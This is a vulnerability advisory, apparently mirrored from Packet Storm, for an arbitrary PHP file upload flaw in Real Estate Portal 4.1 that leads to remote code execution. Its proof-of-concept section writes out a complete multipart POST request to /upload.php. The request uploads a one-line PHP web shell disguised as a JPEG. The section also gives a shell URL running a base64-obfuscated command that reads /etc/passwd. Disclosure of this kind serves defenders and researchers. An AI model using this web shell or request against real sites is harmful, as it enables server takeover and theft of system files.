Real Estate Portal version 4.1 suffers from a remote code execution vulnerability via a remote shell upload.
ee40d9bcfcc0351770d9249cb68627f2796fa878c95e2755270299d38b835caa
Real Estate Portal v4.1 Remote Code Execution Vulnerability
Vendor: NetArt Media
Product web page: http://www.netartmedia.net
Affected version: 4.1
Summary: Real Estate Portal is a software written in PHP,
allowing you to launch powerful and professional looking
real estate portals with rich functionalities for the private
sellers, buyers and real estate agents to list properties
for sale or rent, search in the database, show featured
ads and many others. The private sellers can manage their
ads at any time through their personal administration space.
Desc: Real Estate Portal suffers from an arbitrary file upload
vulnerability leading to an arbitrary PHP code execution. The
vulnerability is caused due to the improper verification of
uploaded files in '/upload.php' script thru the 'myfile' POST
parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script file with '.php' extension
that will be stored in the '/uploads' directory.
Tested on: nginx/1.10.0
PHP/5.2.17
MySQL/5.1.66
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5325
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php
06.05.2016
---
1. Arbitrary File Upload:
-------------------------
Parameter: myfile (POST)
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
POST /upload.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/USERS/index.php
Content-Length: 419
Content-Type: multipart/form-data; boundary=---------------------------8914507815764
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
Connection: close
-----------------------------8914507815764
Content-Disposition: form-data; name="myfile"; filename="Test.php"
Content-Type: image/jpeg
<?php
system($_GET['cmd']);
?>
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed